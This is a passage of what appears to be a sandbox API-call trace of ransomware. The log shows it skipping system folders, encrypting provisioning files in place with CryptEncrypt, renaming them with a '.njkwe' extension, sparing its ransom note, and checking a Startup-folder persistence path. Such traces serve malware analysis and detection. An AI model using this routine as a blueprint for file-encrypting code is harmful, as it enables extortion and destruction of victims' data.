(Brazil)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\54__connections_cellular_ctbc (brazil)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\54__Connections_Cellular_CTBC (Brazil)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\54__connections_cellular_ctbc (brazil)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.013] GetProcessHeap () returned 0xbe0000 [0082.013] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.013] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913b7a34, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913b7a34, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913b7a34, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml", cAlternateFileName="550__C~1.PRO")) returned 1 [0082.013] lstrcmpiW (lpString1="550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.013] lstrcmpiW (lpString1="550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.013] lstrcmpiW (lpString1="550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.013] lstrcmpiW (lpString1="550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.013] lstrcmpiW (lpString1="550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.013] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml") returned 163 [0082.013] StrStrIW (lpFirst="550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.013] lstrcmpW (lpString1="550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.013] lstrcmpW (lpString1="550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.013] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\550__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.013] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\550__connections_cellular_orange (madagascar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.014] GetTickCount () returned 0x1154cf3 [0082.014] GetTickCount () returned 0x1154cf3 [0082.014] GetTickCount () returned 0x1154cf3 [0082.014] GetTickCount () returned 0x1154cf3 [0082.014] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.014] GetProcessHeap () returned 0xbe0000 [0082.014] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.014] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0082.016] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.016] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0082.016] GetProcessHeap () returned 0xbe0000 [0082.016] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.016] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.016] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.017] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.017] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.017] CloseHandle (hObject=0x444) returned 1 [0082.017] GetProcessHeap () returned 0xbe0000 [0082.017] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.017] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0082.018] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\550__connections_cellular_orange (madagascar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\550__Connections_Cellular_Orange (Madagascar)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\550__connections_cellular_orange (madagascar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.018] GetProcessHeap () returned 0xbe0000 [0082.018] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.018] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913ddca3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913ddca3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913ddca3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x33c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml", cAlternateFileName="551__C~1.PRO")) returned 1 [0082.018] lstrcmpiW (lpString1="551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.018] lstrcmpiW (lpString1="551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.018] lstrcmpiW (lpString1="551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.018] lstrcmpiW (lpString1="551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.018] lstrcmpiW (lpString1="551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.018] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml") returned 157 [0082.019] StrStrIW (lpFirst="551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.019] lstrcmpW (lpString1="551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.019] lstrcmpW (lpString1="551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.019] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\551__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.019] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\551__connections_cellular_orange (mali)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.019] GetTickCount () returned 0x1154d03 [0082.019] GetTickCount () returned 0x1154d03 [0082.019] GetTickCount () returned 0x1154d03 [0082.019] GetTickCount () returned 0x1154d03 [0082.019] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.019] GetProcessHeap () returned 0xbe0000 [0082.019] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.019] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x33c, lpOverlapped=0x0) returned 1 [0082.021] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.021] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x33c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x33c, lpOverlapped=0x0) returned 1 [0082.021] GetProcessHeap () returned 0xbe0000 [0082.021] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.021] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.021] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.021] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.021] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.021] CloseHandle (hObject=0x444) returned 1 [0082.025] GetProcessHeap () returned 0xbe0000 [0082.025] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.025] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0082.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\551__connections_cellular_orange (mali)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\551__Connections_Cellular_Orange (Mali)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\551__connections_cellular_orange (mali)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.026] GetProcessHeap () returned 0xbe0000 [0082.026] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.026] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913ddca3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913ddca3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913ddca3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x347, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml", cAlternateFileName="552__C~1.PRO")) returned 1 [0082.026] lstrcmpiW (lpString1="552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.026] lstrcmpiW (lpString1="552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.026] lstrcmpiW (lpString1="552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.026] lstrcmpiW (lpString1="552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.026] lstrcmpiW (lpString1="552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.026] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml") returned 157 [0082.026] StrStrIW (lpFirst="552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.026] lstrcmpW (lpString1="552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.026] lstrcmpW (lpString1="552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.026] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\552__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.026] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\552__connections_cellular_orange (mali)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.027] GetTickCount () returned 0x1154d03 [0082.027] GetTickCount () returned 0x1154d03 [0082.027] GetTickCount () returned 0x1154d03 [0082.027] GetTickCount () returned 0x1154d03 [0082.027] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.027] GetProcessHeap () returned 0xbe0000 [0082.027] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.027] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x347, lpOverlapped=0x0) returned 1 [0082.028] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcb9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.028] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x347, lpOverlapped=0x0) returned 1 [0082.028] GetProcessHeap () returned 0xbe0000 [0082.028] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.028] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.028] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.028] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.029] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.029] CloseHandle (hObject=0x444) returned 1 [0082.029] GetProcessHeap () returned 0xbe0000 [0082.029] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.029] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0082.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\552__connections_cellular_orange (mali)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\552__Connections_Cellular_Orange (Mali)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\552__connections_cellular_orange (mali)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.030] GetProcessHeap () returned 0xbe0000 [0082.030] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.030] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913ddca3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913ddca3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913ddca3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml", cAlternateFileName="553__C~1.PRO")) returned 1 [0082.030] lstrcmpiW (lpString1="553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.030] lstrcmpiW (lpString1="553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.030] lstrcmpiW (lpString1="553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.030] lstrcmpiW (lpString1="553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.030] lstrcmpiW (lpString1="553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.030] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml") returned 162 [0082.030] StrStrIW (lpFirst="553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.030] lstrcmpW (lpString1="553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.030] lstrcmpW (lpString1="553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.030] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\553__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.030] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\553__Connections_Cellular_Orange (Mauritius)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\553__connections_cellular_orange (mauritius)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.031] GetTickCount () returned 0x1154d03 [0082.031] GetTickCount () returned 0x1154d03 [0082.031] GetTickCount () returned 0x1154d03 [0082.031] GetTickCount () returned 0x1154d03 [0082.031] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.031] GetProcessHeap () returned 0xbe0000 [0082.031] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.031] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0082.032] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.032] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c8, lpOverlapped=0x0) returned 1 [0082.032] GetProcessHeap () returned 0xbe0000 [0082.032] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.032] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.032] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.033] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) 